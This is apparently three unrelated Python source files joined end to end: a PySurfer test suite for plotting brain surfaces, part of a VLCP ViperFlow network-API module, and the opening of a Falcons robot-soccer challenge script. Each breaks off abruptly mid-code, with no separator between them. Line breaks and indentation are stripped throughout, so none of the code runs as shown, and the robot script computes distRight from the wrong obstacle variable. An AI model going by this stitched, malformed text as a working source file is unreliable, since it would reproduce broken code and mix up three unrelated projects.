import os import os.path as op from os.path import join as pjoin import sys import warnings import pytest from mayavi import mlab import nibabel as nib import numpy as np from numpy.testing import assert_array_equal, assert_array_less from unittest import SkipTest from surfer import Brain, io, utils from surfer.utils import requires_fsaverage, requires_imageio, requires_fs warnings.simplefilter('always') subject_id = 'fsaverage' std_args = [subject_id, 'lh', 'inflated'] data_dir = pjoin(op.dirname(__file__), '..', '..', 'examples', 'example_data') overlay_fname = pjoin(data_dir, 'lh.sig.nii.gz') def _set_backend(backend=None): """Use testing backend for Windows.""" only_test = (sys.platform == 'win32' or (os.getenv('TRAVIS', 'false') == 'true' and sys.platform == 'linux') and sys.version[0] == '3') if backend is None: backend = 'test' if only_test else 'auto' if only_test and backend != 'test': raise SkipTest('non-testing backend crashes on Windows and ' 'Travis Py3k') mlab.options.backend = backend def get_view(brain): """Setup for view persistence test""" fig = brain._figures[0][0] if mlab.options.backend == 'test': return fig.scene.camera.parallel_scale = 50 assert fig.scene.camera.parallel_scale == 50 view, roll = brain.show_view() return fig.scene.camera.parallel_scale, view, roll def check_view(brain, view): """Test view persistence""" fig = brain._figures[0][0] if mlab.options.backend == 'test': return parallel_scale, view, roll = view assert fig.scene.camera.parallel_scale == parallel_scale view_now, roll_now = brain.show_view() assert view_now[:3] == view[:3] assert_array_equal(view_now[3], view[3]) assert roll_now == roll @requires_fsaverage() def test_offscreen(): """Test offscreen rendering.""" _set_backend() brain = Brain(*std_args, offscreen=True) shot = brain.screenshot() assert_array_less((400, 400, 2), shot.shape) assert_array_less(shot.shape, (801, 801, 4)) brain.close() @requires_fsaverage() def test_image(tmpdir): """Test image saving.""" tmp_name = tmpdir.join('temp.png') tmp_name = str(tmp_name) # coerce to str to avoid PIL error _set_backend() subject_id, _, surf = std_args brain = Brain(subject_id, 'both', surf=surf, size=100) brain.add_overlay(overlay_fname, hemi='lh', min=5, max=20, sign="pos") brain.save_imageset(tmp_name, ['med', 'lat'], 'jpg') brain.close() brain = Brain(*std_args, size=100) brain.save_image(tmp_name) brain.save_image(tmp_name, 'rgba', True) brain.screenshot() if os.getenv('TRAVIS', '') != 'true': # for some reason these fail on Travis sometimes brain.save_montage(tmp_name, ['l', 'v', 'm'], orientation='v') brain.save_montage(tmp_name, ['l', 'v', 'm'], orientation='h') brain.save_montage(tmp_name, [['l', 'v'], ['m', 'f']]) brain.close() @requires_fsaverage() def test_brains(): """Test plotting of Brain with different arguments.""" # testing backend breaks when passing in a figure, so we use 'auto' here # (shouldn't affect usability, but it makes testing more annoying) _set_backend('auto') with warnings.catch_warnings(record=True): # traits for mlab.figure() mlab.figure(101) surfs = ['inflated', 'white', 'white', 'white', 'white', 'white', 'white'] hemis = ['lh', 'rh', 'both', 'both', 'rh', 'both', 'both'] titles = [None, 'Hello', 'Good bye!', 'lut test', 'dict test', 'None test', 'RGB test'] cortices = ["low_contrast", ("Reds", 0, 1, False), 'hotpink', ['yellow', 'blue'], dict(colormap='Greys'), None, (0.5, 0.5, 0.5)] sizes = [500, (400, 300), (300, 300), (300, 400), 500, 400, 300] backgrounds = ["white", "blue", "black", "0.75", (0.2, 0.2, 0.2), "black", "0.75"] foregrounds = ["black", "white", "0.75", "red", (0.2, 0.2, 0.2), "blue", "black"] with warnings.catch_warnings(record=True): # traits for mlab.figure() figs = [101, mlab.figure(), None, None, mlab.figure(), None, None] subj_dir = utils._get_subjects_dir() subj_dirs = [None, subj_dir, subj_dir, subj_dir, subj_dir, subj_dir, subj_dir] alphas = [1.0, 0.5, 0.25, 0.7, 0.5, 0.25, 0.7] for surf, hemi, title, cort, s, bg, fg, fig, sd, alpha \ in zip(surfs, hemis, titles, cortices, sizes, backgrounds, foregrounds, figs, subj_dirs, alphas): brain = Brain(subject_id, hemi, surf, title=title, cortex=cort, alpha=alpha, size=s, background=bg, foreground=fg, figure=fig, subjects_dir=sd) with np.errstate(invalid='ignore'): # encountered in double_scalars brain.set_distance() brain.close() brain = Brain(subject_id, hemi, surf, subjects_dir=sd, interaction='terrain') brain.close() pytest.raises(ValueError, Brain, subject_id, 'lh', 'inflated', subjects_dir='') pytest.raises(ValueError, Brain, subject_id, 'lh', 'inflated', interaction='foo', subjects_dir=sd) @requires_fsaverage() def test_annot(): """Test plotting of annot.""" _set_backend() annots = ['aparc', 'aparc.a2005s'] borders = [True, False, 2] alphas = [1, 0.5] brain = Brain(*std_args) view = get_view(brain) for a, b, p in zip(annots, borders, alphas): brain.add_annotation(a, b, p) check_view(brain, view) brain.set_surf('white') with pytest.raises(ValueError): brain.add_annotation('aparc', borders=-1) subj_dir = utils._get_subjects_dir() annot_path = pjoin(subj_dir, subject_id, 'label', 'lh.aparc.a2009s.annot') labels, ctab, names = nib.freesurfer.read_annot(annot_path) brain.add_annotation((labels, ctab)) brain.close() @requires_fsaverage() def test_contour(): """Test plotting of contour overlay.""" _set_backend() brain = Brain(*std_args) view = get_view(brain) overlay_file = pjoin(data_dir, "lh.sig.nii.gz") brain.add_contour_overlay(overlay_file) brain.add_contour_overlay(overlay_file, max=20, n_contours=9, line_width=2) brain.contour['surface'].actor.property.line_width = 1 brain.contour['surface'].contour.number_of_contours = 10 check_view(brain, view) brain.close() @requires_fsaverage() @requires_fs() def test_data(): """Test plotting of data.""" _set_backend() brain = Brain(*std_args) mri_file = pjoin(data_dir, 'resting_corr.nii.gz') reg_file = pjoin(data_dir, 'register.dat') surf_data = io.project_volume_data(mri_file, "lh", reg_file) brain.add_data(surf_data, -.7, .7, colormap="jet", alpha=.7) brain.set_surf('white') brain.add_data([], vertices=np.array([], int)) brain.close() @requires_fsaverage() def test_data_limits(): """Test handling of data limits.""" _set_backend() brain = Brain(*std_args) surf_data = np.zeros(163842) pytest.raises(ValueError, brain.add_data, surf_data, 0, 0) brain.add_data(surf_data, 0, 1) brain.close() @requires_fsaverage() def test_foci(): """Test plotting of foci.""" _set_backend('test') brain = Brain(*std_args) coords = [[-36, 18, -3], [-43, 25, 24], [-48, 26, -2]] brain.add_foci(coords, map_surface="white", color="gold", name='test1') subj_dir = utils._get_subjects_dir() annot_path = pjoin(subj_dir, subject_id, 'label', 'lh.aparc.a2009s.annot') ids, ctab, names = nib.freesurfer.read_annot(annot_path) verts = np.arange(0, len(ids)) coords = np.random.permutation(verts[ids == 74])[:10] scale_factor = 0.7 brain.add_foci(coords, coords_as_verts=True, scale_factor=scale_factor, color="#A52A2A", name='test2') with pytest.raises(ValueError): brain.remove_foci(['test4']) brain.remove_foci('test1') brain.remove_foci() assert len(brain.foci_dict) == 0 brain.close() @requires_fsaverage() def test_label(): """Test plotting of label.""" _set_backend() subject_id = "fsaverage" hemi = "lh" surf = "inflated" brain = Brain(subject_id, hemi, surf) view = get_view(brain) brain.add_label("BA1") check_view(brain, view) brain.add_label("BA1", color="blue", scalar_thresh=.5) subj_dir = utils._get_subjects_dir() label_file = pjoin(subj_dir, subject_id, "label", "%s.MT.label" % hemi) brain.add_label(label_file) brain.add_label("BA44", borders=True) brain.add_label("BA6", alpha=.7) brain.show_view("medial") brain.add_label("V1", color="steelblue", alpha=.6) brain.add_label("V2", color="#FF6347", alpha=.6) brain.add_label("entorhinal", color=(.2, 1, .5), alpha=.6) brain.set_surf('white') brain.show_view(dict(elevation=40, distance=430), distance=430) with pytest.raises(ValueError, match='!='): brain.show_view(dict(elevation=40, distance=430), distance=431) # remove labels brain.remove_labels('V1') assert 'V2' in brain.labels_dict assert 'V1' not in brain.labels_dict brain.remove_labels() assert 'V2' not in brain.labels_dict brain.close() @requires_fsaverage() def test_meg_inverse(): """Test plotting of MEG inverse solution.""" _set_backend() brain = Brain(*std_args) stc_fname = os.path.join(data_dir, 'meg_source_estimate-lh.stc') stc = io.read_stc(stc_fname) vertices = stc['vertices'] colormap = 'hot' data = stc['data'] data_full = (brain.geo['lh'].nn[vertices][..., np.newaxis] * data[:, np.newaxis]) time = np.linspace(stc['tmin'], stc['tmin'] + data.shape[1] * stc['tstep'], data.shape[1], endpoint=False) def time_label(t): return 'time=%0.2f ms' % (1e3 * t) for use_data in (data, data_full): brain.add_data(use_data, colormap=colormap, vertices=vertices, smoothing_steps=1, time=time, time_label=time_label) brain.scale_data_colormap(fmin=13, fmid=18, fmax=22, transparent=True) assert brain.data_dict['lh']['time_idx'] == 0 brain.set_time(.1) assert brain.data_dict['lh']['time_idx'] == 2 # viewer = TimeViewer(brain) # multiple data layers pytest.raises(ValueError, brain.add_data, data, vertices=vertices, time=time[:-1]) brain.add_data(data, colormap=colormap, vertices=vertices, smoothing_steps=1, time=time, time_label=time_label, initial_time=.09) assert brain.data_dict['lh']['time_idx'] == 1 data_dicts = brain._data_dicts['lh'] assert len(data_dicts) == 3 assert data_dicts[0]['time_idx'] == 1 assert data_dicts[1]['time_idx'] == 1 # shift time in both layers brain.set_data_time_index(0) assert data_dicts[0]['time_idx'] == 0 assert data_dicts[1]['time_idx'] == 0 brain.set_data_smoothing_steps(2) # add second data-layer without time axis brain.add_data(data[:, 1], colormap=colormap, vertices=vertices, smoothing_steps=2) brain.set_data_time_index(2) assert len(data_dicts) == 4 # change surface brain.set_surf('white') # remove all layers brain.remove_data() assert brain._data_dicts['lh'] == [] brain.close() @requires_fsaverage() def test_morphometry(): """Test plotting of morphometry.""" _set_backend() brain = Brain(*std_args) brain.add_morphometry("curv") brain.add_morphometry("sulc", grayscale=True) brain.add_morphometry("thickness") brain.close() @requires_imageio() @requires_fsaverage() def test_movie(tmpdir): """Test saving a movie of an MEG inverse solution.""" import imageio # create and setup the Brain instance _set_backend() brain = Brain(*std_args) stc_fname = os.path.join(data_dir, 'meg_source_estimate-lh.stc') stc = io.read_stc(stc_fname) data = stc['data'] time = np.arange(data.shape[1]) * stc['tstep'] + stc['tmin'] brain.add_data(data, colormap='hot', vertices=stc['vertices'], smoothing_steps=10, time=time, time_label='time=%0.2f ms') brain.scale_data_colormap(fmin=13, fmid=18, fmax=22, transparent=True) # save movies with different options dst = str(tmpdir.join('test.mov')) # test the number of frames in the movie brain.save_movie(dst) frames = imageio.mimread(dst) assert len(frames) == 2 brain.save_movie(dst, time_dilation=10) frames = imageio.mimread(dst) assert len(frames) == 7 brain.save_movie(dst, tmin=0.081, tmax=0.102) frames = imageio.mimread(dst) assert len(frames) == 2 brain.close() @requires_fsaverage() def test_overlay(): """Test plotting of overlay.""" _set_backend() # basic overlay support overlay_file = pjoin(data_dir, "lh.sig.nii.gz") brain = Brain(*std_args) brain.add_overlay(overlay_file) brain.overlays["sig"].remove() brain.add_overlay(overlay_file, min=5, max=20, sign="pos") sig1 = io.read_scalar_data(pjoin(data_dir, "lh.sig.nii.gz")) sig2 = io.read_scalar_data(pjoin(data_dir, "lh.alt_sig.nii.gz")) # two-sided overlay brain.add_overlay(sig1, 4, 30, name="two-sided") overlay = brain.overlays_dict.pop('two-sided')[0] assert_array_equal(overlay.pos_bar.data_range, [4, 30]) assert_array_equal(overlay.neg_bar.data_range, [-30, -4]) assert overlay.pos_bar.reverse_lut assert not overlay.neg_bar.reverse_lut overlay.remove() thresh = 4 sig1[sig1 < thresh] = 0 sig2[sig2 < thresh] = 0 conjunct = np.min(np.vstack((sig1, sig2)), axis=0) brain.add_overlay(sig1, 4, 30, name="sig1") brain.overlays["sig1"].pos_bar.lut_mode = "Reds" brain.overlays["sig1"].pos_bar.visible = False brain.add_overlay(sig2, 4, 30, name="sig2") brain.overlays["sig2"].pos_bar.lut_mode = "Blues" brain.overlays["sig2"].pos_bar.visible = False brain.add_overlay(conjunct, 4, 30, name="conjunct") brain.overlays["conjunct"].pos_bar.lut_mode = "Purples" brain.overlays["conjunct"].pos_bar.visible = False brain.set_surf('white') brain.close() @requires_fsaverage() def test_probabilistic_labels(): """Test plotting of probabilistic labels.""" _set_backend() brain = Brain("fsaverage", "lh", "inflated", cortex="low_contrast") brain.add_label("BA1", color="darkblue") brain.add_label("BA1", color="dodgerblue", scalar_thresh=.5) brain.add_label("BA45", color="firebrick", borders=True) brain.add_label("BA45", color="salmon", borders=True, scalar_thresh=.5) subj_dir = utils._get_subjects_dir() label_file = pjoin(subj_dir, "fsaverage", "label", "lh.BA6.label") prob_field = np.zeros_like(brain.geo['lh'].x) ids, probs = nib.freesurfer.read_label(label_file, read_scalars=True) prob_field[ids] = probs brain.add_data(prob_field, thresh=1e-5) with warnings.catch_warnings(record=True): brain.data["colorbar"].number_of_colors = 10 brain.data["colorbar"].number_of_labels = 11 brain.close() @requires_fsaverage() def test_text(): """Test plotting of text.""" _set_backend('test') brain = Brain(*std_args) brain.add_text(0.1, 0.1, 'Hello', 'blah') brain.close() @requires_fsaverage() def test_animate(tmpdir): """Test animation.""" _set_backend('auto') brain = Brain(*std_args, size=100) brain.add_morphometry('curv') tmp_name = str(tmpdir.join('test.avi')) brain.animate(["m"] * 3, n_steps=2) brain.animate(['l', 'l'], n_steps=2, fname=tmp_name) # can't rotate in axial plane pytest.raises(ValueError, brain.animate, ['l', 'd']) brain.close() @requires_fsaverage() def test_views(): """Test showing different views.""" _set_backend('test') brain = Brain(*std_args) brain.show_view('lateral')
#!/usr/bin/python #! --*-- utf-8 --*-- from vlcp.config import defaultconfig from vlcp.server.module import Module,depend,call_api,api from vlcp.event.runnable import RoutineContainer from vlcp.utils.ethernet import ip4_addr from vlcp.utils.dataobject import updater,\ set_new,dump,ReferenceObject,\ request_context, WeakReferenceObject import vlcp.service.kvdb.objectdb as objectdb from vlcp.utils.networkmodel import * from vlcp.utils.netutils import ip_in_network, network_first, network_last,\ parse_ip4_address, parse_ip4_network,\ format_network_cidr from uuid import uuid1 import copy import logging import itertools from vlcp.utils.exceptions import AsyncTransactionLockException, WalkKeyNotRetrieved,\ APIRejectedException from collections import OrderedDict from contextlib import suppress from vlcp.utils.walkerlib import ensure_keys from pychecktype.checked import checked from vlcp.utils.typelib import ip_address_type, cidr_type, autoint, mac_address_type,\ cidr_nonstrict_type from pychecktype import tuple_, extra from vlcp.utils.dhcp import dhcp_options_type logger = logging.getLogger('viperflow') #logger.setLevel(logging.DEBUG) class UpdateConflictException(Exception): def __init__(self,desc="db update conflict"): super(UpdateConflictException,self).__init__(desc) def dispatch_walker(parameter_dict, walker_map, create, get_type): def _walker(walk, write, timestamp): # Collect type of each item and group into dict type_group = {} all_collected = True for key, parameters in parameter_dict.items(): try: value = walk(key) except WalkKeyNotRetrieved: all_collected = False else: if value is None: if not create: raise ValueError(key + " does not exist") else: if create: # Raise exception set_new(value, value) try: type_, physicalnetwork_id = get_type(key, value, walk, parameters=parameters) except WalkKeyNotRetrieved: all_collected = False else: if type_ in type_group: type_group[type_][key] = (parameters, physicalnetwork_id) else: type_group[type_] = {key: (parameters, physicalnetwork_id)} if not all_collected: return # Check if there are any types that are not in walker_map if any(t not in walker_map for t in type_group): raise AsyncTransactionLockException(type_group) for t, d in type_group.items(): walker_map[t](walk, write, timestamp, {k: v[0] for k, v in d.items()}) return _walker def create_physicalnetwork_gettype(k, v, walk, parameters): return parameters['type'], parameters['id'] def physicalnetwork_gettype(k, v, walk, parameters): return v.type, v.id def create_physicalport_gettype(k, v, walk, parameters): phynet = walk(PhysicalNetwork.default_key(parameters['physicalnetwork'])) if phynet is None: raise ValueError("Physical network " + parameters['physicalnetwork'] + ' not exists') return phynet.type, phynet.id def create_physicalport_prekey(key, parameters): return (PhysicalNetwork.default_key(parameters['physicalnetwork']),) def physicalport_gettype(k, v, walk, parameters): phynet = walk(v.physicalnetwork.getkey()) return phynet.type, phynet.id create_logicalnetwork_gettype = create_physicalport_gettype create_logicalnetwork_prekey = create_physicalport_prekey logicalnetwork_gettype = physicalport_gettype lease_time_type = (autoint, extra(str, check=lambda x: x == 'infinite'), None) def dispatch_async_walker(parameter_dict, create, get_type, publicapi_, direct_get_type = False, pre_keys = None): async def _asyncwalker(last_info, container): walker_map = {} keys = set(parameter_dict) if last_info is None and direct_get_type: type_group = {} for key, parameters in parameter_dict.items(): type_, physicalnetwork_id = get_type(key, None, None, parameters=parameters) if type_ in type_group: type_group[type_][key] = (parameters, physicalnetwork_id) else: type_group[type_] = {key: (parameters, physicalnetwork_id)} last_info = type_group if last_info is not None: for t, d in last_info.items(): # Collect walker and keys from public API try: walker, k_ = await call_api(container, 'public', publicapi_, {'type': t}) except APIRejectedException: raise ValueError("Physical network type %r is not supported, or the corresponding network plugin is not loaded" % (t,)) for _, (parameters, phynet_id) in d.items(): # If it is not changed, this network is needed # this reduces an extra retry keys.add(PhysicalNetwork.default_key(phynet_id)) if k_: for _, (parameters, phynet_id) in d.items(): keys.update(k_(phynet_id, parameters)) walker_map[t] = walker else: if pre_keys: for key, parameters in parameter_dict.items(): keys.update(pre_keys(key, parameters)) return (tuple(keys), dispatch_walker(parameter_dict, walker_map, create, get_type)) return _asyncwalker @defaultconfig @depend(objectdb.ObjectDB) class ViperFlow(Module): """ Standard network model for L2 SDN """ def __init__(self,server): super(ViperFlow,self).__init__(server) self.app_routine = RoutineContainer(self.scheduler) self._reqid = 0 self.createAPI(api(self.createphysicalnetwork,self.app_routine), api(self.createphysicalnetworks,self.app_routine), api(self.updatephysicalnetwork,self.app_routine), api(self.updatephysicalnetworks,self.app_routine), api(self.deletephysicalnetwork,self.app_routine), api(self.deletephysicalnetworks,self.app_routine), api(self.listphysicalnetworks,self.app_routine), api(self.createphysicalport,self.app_routine), api(self.createphysicalports,self.app_routine), api(self.updatephysicalport,self.app_routine), api(self.updatephysicalports,self.app_routine), api(self.deletephysicalport,self.app_routine), api(self.deletephysicalports,self.app_routine), api(self.listphysicalports,self.app_routine), api(self.createlogicalnetwork,self.app_routine), api(self.createlogicalnetworks,self.app_routine), api(self.updatelogicalnetwork,self.app_routine), api(self.updatelogicalnetworks,self.app_routine), api(self.deletelogicalnetwork,self.app_routine), api(self.deletelogicalnetworks,self.app_routine), api(self.listlogicalnetworks,self.app_routine), api(self.createlogicalport,self.app_routine), api(self.createlogicalports,self.app_routine), api(self.updatelogicalport,self.app_routine), api(self.updatelogicalports,self.app_routine), api(self.deletelogicalport,self.app_routine), api(self.deletelogicalports,self.app_routine), api(self.listlogicalports,self.app_routine), api(self.createsubnet,self.app_routine), api(self.createsubnets,self.app_routine), api(self.updatesubnet,self.app_routine), api(self.updatesubnets,self.app_routine), api(self.deletesubnet,self.app_routine), api(self.deletesubnets,self.app_routine), api(self.listsubnets,self.app_routine) ) async def _dumpkeys(self, keys, filter=None): self._reqid += 1 reqid = ('viperflow', self._reqid) with request_context(reqid, self.app_routine): retobjs = await call_api(self.app_routine,'objectdb','mget',{'keys':keys,'requestid':reqid}) if filter is None: return [dump(o) for o in retobjs] else: return [dump(o) for o in retobjs if o is not None and all(getattr(o, k, None) == v for k, v in filter.items())] async def _dumpone(self, key, filter): return await self._dumpkeys([key], filter) async def createphysicalnetwork(self, type: str = 'vlan', id: (str, None) = None, **kwargs: {'?vnirange': [tuple_((int, int))], "?vlanrange": [tuple_((int, int))]}): """ Create physical network. :param type: Network type, usually one of *vlan*, *vxlan*, *local*, *native* :param id: Specify the created physical network ID. If omitted or None, an UUID is generated. :param \*\*kwargs: extended creation parameters. Look for the document of the corresponding driver. Common options include: vnirange list of ``[start,end]`` ranges like ``[[1000,2000]]``. Both *start* and *end* are included. It specifies the usable VNI ranges for VXLAN network. vlanrange list of ``[start,end]`` ranges like ``[[1000,2000]]``. Both *start* and *end* are included. It specifies the usable VLAN tag ranges for VLAN network. :return: A dictionary of information of the created physical network. """ if not id: id = str(uuid1()) network = {'type':type,'id':id} network.update(kwargs) return await self.createphysicalnetworks([network]) @checked async def createphysicalnetworks(self,networks: [{"?id": str, "type": str, '?vnirange': [tuple_((int, int))], "?vlanrange": [tuple_((int, int))]}]): """ Create multiple physical networks in a transaction. :param networks: each should be a dictionary contains all the parameters in ``createphysicalnetwork`` :return: A list of dictionaries of information of the created physical networks. """ #networks [{type='vlan' or 'vxlan',id = None or uuid1(),'vlanrange':[(100,200),(400,401)],kwargs}] parameter_dict = OrderedDict() # first check id is None, allocate for it # group by type, do it use type driver for network in networks: # # deepcopy every networks elements # case:[network]*N point to same object will auto create same id # network = copy.deepcopy(network) if 'id' not in network: network['id'] = str(uuid1()) phynetkey = PhysicalNetwork.default_key(network['id']) if phynetkey in parameter_dict: raise ValueError("Repeated ID: " + network['id']) parameter_dict[phynetkey] = network await call_api(self.app_routine, 'objectdb', 'asyncwritewalk', {"asyncwalker": dispatch_async_walker(parameter_dict, True, create_physicalnetwork_gettype, 'createphysicalnetwork', direct_get_type=True), "withtime": True}) return await self._dumpkeys(parameter_dict) async def updatephysicalnetwork(self, id: str, **kwargs: {'?vnirange': [tuple_((int, int))], "?vlanrange": [tuple_((int, int))]}): """ Update physical network with the specified ID. :param id: physical network ID :param \*\*kwargs: attributes to be updated, usually the same attributes for creating. :return: A dictionary of information of the updated physical network. """ network = {"id":id} network.update(kwargs) return await self.updatephysicalnetworks([network]) @checked async def updatephysicalnetworks(self,networks: [{"id": str, '?vnirange': [tuple_((int, int))], "?vlanrange": [tuple_((int, int))]}]): """ Update multiple physical networks in a transaction :param networks: a list of dictionaries, each contains parameters of ``updatephysicalnetwork`` :return: A list of dictionaries of information of the updated physical network. """ # networks [{"id":phynetid,....}] parameter_dict = OrderedDict() for network in networks: if 'type' in network: raise ValueError("physical network type can't be changed") phynetkey = PhysicalNetwork.default_key(network['id']) if phynetkey in parameter_dict: raise ValueError("Repeated ID: "+network['id']) parameter_dict[phynetkey] = network await call_api(self.app_routine, 'objectdb', 'asyncwritewalk', {"asyncwalker": dispatch_async_walker(parameter_dict, False, physicalnetwork_gettype, 'updatephysicalnetwork'), "withtime": True}) return await self._dumpkeys(parameter_dict) async def deletephysicalnetwork(self, id: str): """ Delete physical network with specified ID :param id: Physical network ID :return: ``{"status": "OK"}`` """ network = {"id":id} return await self.deletephysicalnetworks([network]) @checked async def deletephysicalnetworks(self,networks: [{"id": str}]): """ Delete multiple physical networks with a transaction :param networks: a list of ``{"id": <id>}`` dictionaries. :return: ``{"status": "OK"}`` """ # networks [{"id":id},{"id":id}] parameter_dict = {} for network in networks: phynetkey = PhysicalNetwork.default_key(network['id']) if phynetkey in parameter_dict: raise ValueError("Repeated ID: "+network['id']) parameter_dict[phynetkey] = network await call_api(self.app_routine, 'objectdb', 'asyncwritewalk', {"asyncwalker": dispatch_async_walker(parameter_dict, False, physicalnetwork_gettype, 'deletephysicalnetwork'), "withtime": True}) return {"status":'OK'} async def listphysicalnetworks(self,id = None,**kwargs): """ Query physical network information :param id: If specified, only return the physical network with the specified ID. :param \*\*kwargs: customized filters, only return a physical network if the attribute value of this physical network matches the specified value. :return: A list of dictionaries each stands for a matched physical network """ def set_walker(key,set,walk,save): if set is None: return for refnetwork in set.dataset(): networkkey = refnetwork.getkey() with suppress(WalkKeyNotRetrieved): networkobj = walk(networkkey) if all(getattr(networkobj,k,None) == v for k,v in kwargs.items()): save(networkkey) def walker_func(set_func): def walker(key,obj,walk,save): if obj is None: return set_walker(key,set_func(obj),walk,save) return walker # get all phynet if not id: physetkey = PhysicalNetworkSet.default_key() # an unique id used to unwatch self._reqid += 1 reqid = ('viperflow',self._reqid) with request_context(reqid, self.app_routine): _, values = await call_api(self.app_routine,'objectdb','walk',{'keys':[physetkey], 'walkerdict':{physetkey:walker_func(lambda x:x.set)}, 'requestid':reqid}) return [dump(r) for r in values] else: # get that id phynet info phynetkey = PhysicalNetwork.default_key(id) return await self._dumpone(phynetkey,kwargs) async def createphysicalport(self,physicalnetwork: str, name: str, vhost: str='', systemid: str='%', bridge: str='%', **kwargs): """ Create physical port :param physicalnetwork: physical network this port is in. :param name: port
# Copyright 2018-2019 <NAME>) # SPDX-License-Identifier: Apache-2.0 from robotScenarioBase import * from FalconsCoordinates import Vec2d, RobotPose from math import pi import logging # Script for Robocup World Championship 2018, tech challenge run 1 # Conditions: # two robots, wifi on, normal MSL field and lighting # 4 randomly placed, colored obstacles (not black!) # normal ball and black/white official ball # --> Input Andre: cannot handle black/white ball, stick to normal MSL ball for now # (too bad, 30% of points cannot be attained) # # It is not really clear if we can choose playing direction based on obstacles positions. # Rules suggest that robots are placed, then balls based on robots, finally obstacles. # But thanks to the new heightmap (awesome suggestion by Coen) we should be OK. # # Roles are based on starting position: the one close to field center gets main role 1, other support role 2 # # Tricks/steps to perform: # 1: pass over the ground 3 times (both robots) # 2: shoot in goal 3 times (only main robot) # 3: shoot at pole over the ground 3 times (only main robot) # 4: shoot at bar 3 times (require support robot to catch and pass back) # 5: lob pass, 8m away from each other (require support robot to catch and pass back) # Tricks 4 and 5 are considered 'advanced'. # R prefix: which role TRICK_SEQUENCE = [2, 3, 4, 5] MAIN_PLAYER_ONLY = False SIMULATION = True FIELD_SIZE = 1 # 0 is small (Canada), 1 is normal (Locht) and 2 is large (2018+) FIELD_SIZE_Y = [5.8, 9, 11][FIELD_SIZE] FIELD_SIZE_X = [5, 6, 7][FIELD_SIZE] PENALTY_AREA_SIZE_Y = 2.25 # same for large field GOAL_WIDTH = [2.42, 2.0, 2.4][FIELD_SIZE] GOAL_POST_WIDTH = [0.10, 0.125, 0.10][FIELD_SIZE] INTERCEPT_RADIUS_SMALL = 3.0 INTERCEPT_RADIUS_LARGE = 6.0 FORWARD_PHI = 0.5*pi BACKWARD_PHI = 1.5*pi PENALTY_Y = FIELD_SIZE_Y - 3 # rules: 3m from the goal, regardless of size R1_START_POS = (0, 2*(FIELD_SIZE == 0)) R2_START_POS = (0, -4) LANE_X_POSITION = 0.0 # calculated by _determineLaneX and used to override passing & lob bar x positions, avoiding obstacles as good as possible R1_SEARCH_BALL_POS = (0, PENALTY_Y) SLEEP_SETTLE = 1.0 SLEEP_AFTER_KICK = 1.0 # large enough to not immediately chase the ball, but short enough to get moving to next position (see _waitUntilPassReceiverReady) NUM_DOUBLE_PASSES = 2 # 3 passes is sufficient but with an even number the ball is back at role1; 2 means twice from r1 to r2 and back NUM_LOB_PASSES = 5 - 3 * SIMULATION NUM_SIMPLE_GOALS = 4 - 2 * SIMULATION NUM_GOAL_POST_HITS = 5 - 3 * SIMULATION NUM_GOAL_BAR_HITS = 4 - 2 * SIMULATION SIMPLE_GOAL_POWER = 50.0 + (20.0 * SIMULATION) GOAL_POST_HIT_POWER = 45.0 + (8.0 * SIMULATION) # UNUSED -- we use motionPlanning pass action including its power setpoint calculation GOAL_BAR_KICK_POWER = 77.0 # tuned on robot 4 at Canada GOAL_BAR_KICK_HEIGHT = 150 # tuned on robot 4 at locht, may 22 [MVEH] LOB_PASS_KICK_POWER = 86.0 LOB_PASS_KICK_HEIGHT = 200 TOLERANCE_FINE_XY = 0.01 TOLERANCE_FINE_PHI = 0.005 OBSTACLE_CLOSEBY_LIMIT = 0.7 # all local functions are prefixed with an underscore _ # to be able to filter them in robotLibrary scenario selector ###### utility functions ###### def _log(s): logging.info(s) def _waitUntilBothActive(): if MAIN_PLAYER_ONLY: return tt = robot.teamMembers() while len(tt) < 1: sleep(1) tt = robot.teamMembers() def _waitTeamHasBall(): _log("waiting until team has the ball ...") while not robot.teamHasBall(): sleep(1) _log("team has the ball") def _ensureHasBall(): if not robot.hasBall(): _log("ensuring we have the ball") robot.getBall() def _determineTrickSequence(): # TODO based on starting orientation, skip some steps? # however, rules do not allow adding points from separate attempts, each attempt is a full restart # so this is not useful during techChallenge (only useful during dev / test / tuning) return TRICK_SEQUENCE def _friendPosition(): return robot.getPosition(robot.teamMembers()[0]) def _friendVelocity(): return robot.getVelocity(robot.teamMembers()[0]) def _friendIsMoving(): if MAIN_PLAYER_ONLY: return False return (_friendVelocity().xy().size() > 0.1) def _calcPassMainPos(): # assume robot just got the ball - use its position and face into direction where supporter should stand result = robot.getPosition() result.Rz = BACKWARD_PHI return (result.x, result.y, result.Rz) def _calcPassSupportPos(): # calculate based on friend position, rely on use moveToFreeSpotNearPosition result = _friendPosition() result.y = -3 # position at other half result.Rz = FORWARD_PHI return (result.x, result.y, result.Rz) def _calcAdvancedSupportPos(): return (LANE_X_POSITION, -4, FORWARD_PHI) def _determineLaneX(): # sync: wait until both robots stand still # main robot on penalty position # support robot on (0,-4) # this should give a good view on where the obstacles are # the robot calling this function is already standing still # so the sync is achieved by waiting on the other global LANE_X_POSITION if MAIN_PLAYER_ONLY: LANE_X_POSITION = 0 return while _friendIsMoving(): sleep(0.5) # calculate bestDist = 0.0 numX = 5 limX = GOAL_WIDTH * 0.5 - 0.2 x = -limX bestX = x stepX = 2 * limX / numX for iX in range(numX+1): x = -limX + iX * stepX minDist = 9 for obst in robot.obstacles(): minDist = min(minDist, abs(obst[0] - x)) if minDist > bestDist: bestDist = minDist bestX = x # store result LANE_X_POSITION = bestX _log('choosing lane at x = %6.2f' % (bestX)) def _waitUntilPassReceiverReady(): # TODO also use distance? probably not robust enough... _log("waiting until pass receiver ready ...") while _friendIsMoving(): sleep(0.5) _log("pass receiver is ready") def _calcSimpleGoalPos(): # TODO avoid any obstacle nearby goal? NO, choose starting orientation such that penalty spot can be used return (0, PENALTY_Y, FORWARD_PHI) def _calcGoalPostPos(): # choose goalpost with no obstacle nearby posX = 0.5 * GOAL_WIDTH + 0.5 * GOAL_POST_WIDTH posLeft = Vec2d(-posX, FIELD_SIZE_Y) posRight = Vec2d(posX, FIELD_SIZE_Y) chooseLeft = True try: obstLeft = robot.findClosestObstacle(posLeft) distLeft = (obstLeft - posLeft).size() obstRight = robot.findClosestObstacle(posRight) distRight = (obstLeft - posRight).size() if distRight < distLeft: chooseLeft = False except: pass result = posRight if chooseLeft: result = posLeft return (result.x, result.y, FORWARD_PHI) def _interceptWrapper(x, y, phi=0, radius=INTERCEPT_RADIUS_SMALL, repositionRadius=INTERCEPT_RADIUS_SMALL): # ideally we use teamplay stuff, rather than restoring old python interceptBall _log("receiving pass ...") 